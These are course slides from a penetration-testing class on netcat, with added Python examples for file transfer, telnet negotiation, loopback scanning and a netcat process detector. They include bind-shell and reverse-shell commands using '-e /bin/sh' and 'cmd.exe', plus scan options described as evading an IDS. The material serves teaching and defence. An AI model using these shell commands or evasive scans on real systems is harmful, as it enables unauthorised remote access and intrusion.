COMP265 - Pentesting
netcat
What?
• Like cat, but for networks
• Standard input sent over network to remote ip:port
• Packets from network sent to standard output
• Low level
• Versatile
• “The network Swiss army knife”
Basic Operation
• Client mode:
– Connects to specific remote port
• Listen mode:
– Waits for connection on a port
• Both modes
– Send Standard Input to net
– Data from net sent to Standard Output
• Messages from netcat sent to standard Error
• Packets can have source routing attached
Netcat Command
• May be the two-letter command “nc”
– Like cp and other traditional two-letter Unix commands
– nc options hostname ports
• May be the word “netcat”
• Another variant “ncat”, from nmap project
– Supports a few more options
• Depends on the platform, Kali has both
• Sometimes have to compile from source to get all options (Suse)
Command Options
-l listen mode, for inbound connects
-L "Listen harder" Persistent listener (Win only)
-n numeric-only IP addresses, no DNS
-p port local port number
-r randomize local and remote ports
-s addr local source address
-u UDP mode
--sctp sctp mode
-v verbose [use twice to be more verbose]
Command Options
-i secs delay interval for lines sent, ports scanned
-t answer TELNET negotiation
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
These three options are not available in some packages
-o file or -x file (hex) dump of traffic
-e prog or -c command program to exec after connect
-g gateway source-routing hop point[s], up to 8
What for?
• Send files
• Telnet
• Backdoor
• Port scan
• Banner grabbing
• Reverse shell
• Relay (proxy)
• Port forward
• Replay
Arguments
• Host can be name or ip
-n = no dns lookups, ip only
otherwise
full DNS forward and reverse lookup
-v or -vv = verbose messages, always sent to standard error
-w limits wait time, -w 3 recommended
-o filename produces a dump of all traffic, each line marked > (sent) or < (received)
-i slows down sending, used if input from a file
Send Files
• Sender
– nc -l -p 80 < file.txt
– cat file.txt | nc -l -p 80
• Receiver
– nc 192.168.1.1 80 > file.txt
• Note use of redirect and pipe
• Receiver could have been a web browser
• <, > and | all extend the power of netcat
Another Example
dd if=/dev/sda3 | gzip | nc -l 80
nc 192.168.17.1 80 > sda3.img.gz
• Or, the listener can be the receiver
nc -w 3 -l 80 > /home.cmb.tar.gz
tar -cvf - /home/cmb | gzip | nc 192.168.17.1 80
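The Basic Operation and Send Files slides describe netcat as a pipe whose ends are a socket: bytes in on one side come out on the other, and the transfer ends when the sender closes. The following is an added example (not from the slides or from any netcat implementation) that reproduces that mechanic on loopback in Python: one function plays `nc -l -p PORT > file.txt`, the other plays `nc HOST PORT < file.txt`. Port number, payload and temporary file names are constructed for the demo.

```python
import os
import socket
import tempfile
import threading


def start_file_listener(dst_path):
    """Listener side of 'nc -l -p PORT > file.txt'.

    Binds a loopback port (0 lets the OS pick a free one), accepts one
    connection and writes every byte received to dst_path until the sender
    closes, which is the EOF a netcat listener ends on.  Returns the chosen
    port and the worker thread so the caller can wait for completion."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn, open(dst_path, "wb") as out:
            while True:
                chunk = conn.recv(4096)
                if not chunk:          # peer closed its write side: EOF
                    break
                out.write(chunk)
        srv.close()

    worker = threading.Thread(target=serve, daemon=True)
    worker.start()
    return port, worker


def send_stream(host, port, data, timeout=3.0):
    """Client side of 'nc HOST PORT < file.txt' (timeout plays the role of -w).

    Pushes the bytes, then shuts down the write half so the listener sees EOF.
    Without that step some netcat builds keep the connection open after stdin
    ends and the receiver never finishes.  Returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)
    return len(data)


def transfer_file(src_path, dst_path):
    """Move src_path to dst_path over loopback the way the two nc commands do."""
    port, worker = start_file_listener(dst_path)
    with open(src_path, "rb") as f:
        sent = send_stream("127.0.0.1", port, f.read())
    worker.join(timeout=5)
    return sent


def demo():
    """Constructed sample: a small binary payload (including NUL bytes, which
    netcat passes through untouched) sent from one temp file to another."""
    payload = b"COMP265 netcat demo\x00\x01\xff" * 1000     # 22 000 bytes
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "file.txt")
        dst = os.path.join(tmp, "received.txt")
        with open(src, "wb") as f:
            f.write(payload)
        sent = transfer_file(src, dst)
        with open(dst, "rb") as f:
            received = f.read()
    return {"sent": sent, "received": len(received), "matches": received == payload}


if __name__ == "__main__":
    print(demo())
```

The `shutdown(SHUT_WR)` call is the part worth noticing: it is the programmatic equivalent of stdin reaching EOF, and it is why the listener's `recv` returns an empty chunk and the file closes cleanly. The `-w 3` on the slide's listener is the fallback for senders that never do this.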
nc telnet
cmblap:~ # telnet 192.168.17.24 25
Trying 192.168.17.24...
Connected to 192.168.17.24.
Escape character is '^]'.
220 fivefortyfour.com ESMTP
^C
^]
telnet> quit
Connection closed.
cmblap:~ # netcat 192.168.17.24 25
220 fivefortyfour.com ESMTP
helo
250 fivefortyfour.com
quit
221 fivefortyfour.com
cmblap:
As telnet client
• Netcat quits when you want it to
• Doesn't pay attention to standard input EOF
• Doesn't require escape character
• Less cruft
• Transfers arbitrary binary data
• Better utility for probing services
• Can use UDP
-t responds automatically to telnet option negotiations
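What `-t` actually does is answer the telnet option negotiation a telnet daemon sends before its login prompt (IAC DO/WILL sequences) with a refusal (WONT/DONT), so the raw bytes you see are the service's real output rather than control codes. The following is an added example, not from the slides or from netcat's source, of that negotiation logic in Python: it separates application bytes from negotiation, builds the refusal reply, and returns any trailing partial sequence so a caller can prepend it to the next read. The sample input is constructed.

```python
# Telnet protocol constants (RFC 854)
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def answer_telnet_negotiation(data):
    """Split a raw byte stream from a telnet-speaking service into
    (application bytes, reply bytes, unprocessed tail).

    Every DO is refused with WONT and every WILL with DONT, which is the
    'answer TELNET negotiation' behaviour the -t option turns on.  IAC IAC is
    an escaped literal 0xFF and is kept as data; sub-negotiation blocks
    (IAC SB ... IAC SE) are dropped.  An incomplete sequence at the end of the
    buffer is returned as the tail rather than misread."""
    clean = bytearray()
    reply = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            clean.append(b)
            i += 1
            continue
        if i + 1 >= n:                 # dangling IAC: wait for more input
            break
        cmd = data[i + 1]
        if cmd == IAC:                 # escaped 0xFF data byte
            clean.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= n:
                break
            opt = data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3                     # DONT/WONT need no answer
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break
            i = end + 2
        else:
            i += 2                     # other two-byte commands (NOP, GA, ...)
    return bytes(clean), bytes(reply), data[i:]


if __name__ == "__main__":
    # Constructed: "DO TERMINAL-TYPE, WILL ECHO" followed by a login prompt
    sample = b"\xff\xfd\x18\xff\xfb\x01login: "
    print(answer_telnet_negotiation(sample))
```

Without this step, a plain `nc host 23` shows the IAC bytes as garbage in front of the banner and the daemon may wait for answers that never come; with it, the stream reads like the SMTP and POP3 sessions on the slides.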
Probing?
• Netcat can do port scans
• This took around 1 sec
cmblap:~ # netcat -v -w 2 -z 192.168.17.24 20-1000
jabber.fivefortyfour.com [192.168.17.24] 631 (ipp) open
jabber.fivefortyfour.com [192.168.17.24] 445 (microsoft-ds) open
jabber.fivefortyfour.com [192.168.17.24] 139 (netbios-ssn) open
jabber.fivefortyfour.com [192.168.17.24] 111 (sunrpc) open
jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open
jabber.fivefortyfour.com [192.168.17.24] 80 (http) open
jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open
jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open
jabber.fivefortyfour.com [192.168.17.24] 24 (?) open
jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open
cmblap:~ #
UDP scans too
• These are much slower
cmblap:~ # netcat -v -w 2 -z -u 192.168.17.24 20-100
jabber.fivefortyfour.com [192.168.17.24] 67 (bootps) open
jabber.fivefortyfour.com [192.168.17.24] 53 (domain) open
Scanning Options
-i
– Delay interval to slow down scans
-r
– Randomise ports, including source
-z
– Send no data (TCP) or minimal data (UDP)
-i and -r help to evade an IDS
-vv reports closed ports
Fancier Scan
echo QUIT | nc -v -w 5 target-host 20-250 500-600 5990-7000
Banner Grabbing
cmblap:~ # netcat -v 192.168.17.24 110
jabber.fivefortyfour.com [192.168.17.24] 110 (pop3) open
+OK Hello there.
quit
+OK Better luck next time.
cmblap:~ # netcat -v 192.168.17.24 25
jabber.fivefortyfour.com [192.168.17.24] 25 (smtp) open
220 fivefortyfour.com ESMTP
quit
221 fivefortyfour.com
cmblap:~ # netcat -v 192.168.17.24 22
jabber.fivefortyfour.com [192.168.17.24] 22 (ssh) open
SSH-1.99-OpenSSH_4.1
quit
Protocol mismatch.
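The scan slides (`-z -w 2`) and the banner-grabbing slides above are two uses of the same connect-and-read mechanic, and the listener's side of it is what a defender sees in logs: a `-z` probe completes the TCP handshake and sends nothing, while `echo QUIT | nc` sends a few bytes after reading the greeting. The following is an added example, not from the slides or from netcat itself, that implements both probes in Python against a constructed loopback service that greets clients with a banner and records how many bytes each client sent. Banner text, port numbers and the service itself are constructed.

```python
import queue
import socket
import threading


def start_banner_service(banner=b"220 test.example ESMTP\r\n"):
    """Constructed stand-in for the SMTP/POP3 daemons on the slides: greets each
    client with a banner, then counts the bytes the client sends before hanging
    up.  Returns (port, counts); one count is queued per connection, which is
    the listener's-eye view a defender gets from connection logging."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    port = srv.getsockname()[1]
    counts = queue.Queue()

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            total = 0
            with conn:
                try:
                    conn.sendall(banner)
                    while True:
                        chunk = conn.recv(1024)
                        if not chunk:
                            break
                        total += len(chunk)
                except OSError:
                    pass          # a -z probe may reset the socket before we finish
            counts.put(total)

    threading.Thread(target=serve, daemon=True).start()
    return port, counts


def zero_io_scan(host, ports, timeout=2.0):
    """What 'nc -z -w 2 host lo-hi' does: a full TCP connect per port, no data
    in either direction, immediate close.  Open ports are those that accepted."""
    found = []
    for p in ports:
        try:
            with socket.create_connection((host, p), timeout=timeout):
                found.append(p)
        except OSError:
            pass                  # refused or timed out: closed/filtered
    return found


def grab_banner(host, port, timeout=2.0):
    """What 'echo QUIT | nc -v host port' does: connect, read the first line the
    service volunteers, send QUIT, close."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        buf = b""
        while b"\n" not in buf:
            chunk = s.recv(256)
            if not chunk:
                break
            buf += chunk
        s.sendall(b"QUIT\r\n")
    return buf.split(b"\n", 1)[0].rstrip(b"\r").decode(errors="replace")


def closed_loopback_port():
    """Reserve a port, read it back and release it so the scan has a known-closed target."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    port, counts = start_banner_service()
    shut = closed_loopback_port()
    found = zero_io_scan("127.0.0.1", [shut, port])
    banner = grab_banner("127.0.0.1", port)
    return {
        "open_found": port in found,
        "closed_found": shut in found,
        "banner": banner,
        "bytes_from_scan": counts.get(timeout=5),    # the -z probe sent nothing
        "bytes_from_probe": counts.get(timeout=5),   # QUIT\r\n is 6 bytes
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats the slides leave implicit. A TCP `-z` scan is a full connect, so every probed port shows up in the target's service logs as a connection with zero bytes of payload, which is an easy signature to alert on. The UDP scan (`-z -u`) is not reproduced here because it works by absence: netcat reports a UDP port "open" when no ICMP port-unreachable comes back, so a filtered port looks identical to an open one, and that is why the slide's UDP results are both slower and less trustworthy.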
Chat Session
• Just for fun
• Machine 192.168.17.6
– nc -l -p 1234
• Machine 2
– nc 192.168.17.6 1234
• Both machines' keyboard input appears on the other machine's screen
• Note: use the -v option to diagnose problems that may appear
Web Browser
printf 'GET / HTTP/1.0\r\nHost: somewhere.com\r\n\r\n' | nc address 80 > page.html
Backdoor
• By routing netcat's standard output to a command interpreter, we create a remote shell
cmblap:/usr/local/src/netcat-0.7.1/src # ./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh
Connection from 192.168.18.1:4289
cmblap:/usr/local/src/netcat-0.7.1/src #
• I had to dl and build to enable the -e switch
• Cannot pass parameters to program
On the other end
pdlnx2:~ # netcat -v 192.168.18.8 1234
DNS fwd/rev mismatch: cmblap.fivefortyfour.com != cmblap
cmblap.fivefortyfour.com [192.168.18.8] 1234 (search-agent) open
df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/sda6 20641788 7448780 12144368 39% /
udev 1540268 192 1540076 1% /dev
/dev/sda2 39942856 8711724 31231132 22% /windows/C
/dev/sda8 20650996 17395552 2206404 89% /home/cmb
exit
pdlnx2:~ #
More backdoors
• On windows:
nc -L -p 1234 -d -e cmd.exe
• -L means listen hard
– wait for connections
– Not needed on unix
• -d means detach from process
– Also not needed on linux
“Shoveling” a Shell
• Aka Reverse Shell
• Compromised machine cannot accept connections
– Has to initiate connections because of firewall/NAT
• Attacker listens from outside the firewall
– netcat -v -l -p 1234
• Script on compromised machine starts shell then connects to attacker
– netcat ip.addr 1234 -e /bin/sh
• Script has to run forever, or at timed intervals, or in response to some event
Port Forwarding
• Forwarding localhost port 8080 to remote host port 80
• ncat -l localhost 8080 --sh-exec "ncat remote.host 80"
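The Backdoor, More backdoors, Shoveling a Shell and Port Forwarding slides all rely on the same two groups of flags: something that makes netcat listen (`-l`, `-L`) and something that hands the connection to a program (`-e`, `-c`, `--sh-exec`, `--exec`). Those flags are therefore the first thing to hunt for in a process list on a host you suspect is compromised. The following is an added example, not from the slides or from any netcat project, that parses constructed `ps`-style rows (pid, user, command line) and classifies netcat invocations; the binary-name list and the sample rows are assumptions built from the commands on the slides.

```python
import shlex
from dataclasses import dataclass
from typing import Optional

# Names netcat is installed under (assumption: extend for your distribution)
NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
# ncat long forms for "run a program on connect"
EXEC_LONG = {"--exec", "--sh-exec", "--lua-exec"}


@dataclass
class Finding:
    pid: int
    user: str
    kind: str                 # "exec-listener", "reverse-shell" or "listener"
    program: Optional[str]    # what -e/-c/--sh-exec would run, if any
    cmdline: str


def classify_netcat(cmdline):
    """Return (kind, program) for a netcat command line, or None when the line
    is not netcat or is a plain client with nothing to flag."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        argv = cmdline.split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listen, program = False, None
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok == "--listen":
            listen = True
        elif tok in EXEC_LONG:
            program = argv[i + 1] if i + 1 < len(argv) else "?"
            i += 1
        elif tok.startswith("-") and not tok.startswith("--"):
            # short options may be clustered, e.g. -lvp 1234
            for ch in tok[1:]:
                if ch in "lL":
                    listen = True
                elif ch in "ec":            # -e prog / -c command take the next token
                    program = argv[i + 1] if i + 1 < len(argv) else "?"
                    i += 1
                    break
        i += 1
    if program and listen:
        return "exec-listener", program    # backdoor, or a --sh-exec port forward
    if program:
        return "reverse-shell", program    # outbound connect that hands over a shell
    if listen:
        return "listener", None
    return None


def scan_process_list(lines):
    """lines: 'PID USER COMMAND' rows, the shape 'ps -eo pid,user,args --no-headers' prints."""
    findings = []
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        result = classify_netcat(cmd)
        if result:
            findings.append(Finding(int(pid), user, result[0], result[1], cmd))
    return findings


# Constructed sample rows; the netcat commands are the ones shown on the slides
SAMPLE_PS = [
    "4412 root ./netcat -l -n -v -s 192.168.18.8 -p 1234 -e /bin/sh",
    "4420 cmb  netcat 192.168.18.1 1234 -e /bin/sh",
    '4431 cmb  ncat -l localhost 8080 --sh-exec "ncat remote.host 80"',
    "4440 cmb  nc -l -p 1234",
    "4450 cmb  netcat -v -w 2 -z 192.168.17.24 20-1000",
    "4460 cmb  cat file.txt",
]

if __name__ == "__main__":
    for f in scan_process_list(SAMPLE_PS):
        print(f.pid, f.user, f.kind, f.program)
```

Treat this as a first pass rather than a verdict: the command line in `ps` is under the process owner's control and the binary can be renamed, so confirm with the socket view (`ss -tlnp` for listeners, `ss -tnp` for established outbound connections) and with the parent process, since a shell whose parent is a netcat is the reverse-shell case regardless of what the command line says.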
References
• ncat – http://nmap.org/ncat/
– User's guide is a good reference: http://nmap.org/ncat/guide/index.html
• netcat – http://netcat.sourceforge.net/
• Don't forget the man pages
Lab
• Lab today will exercise many of these functions
• Due the day of the lab next week, Feb 18
– No new lab next week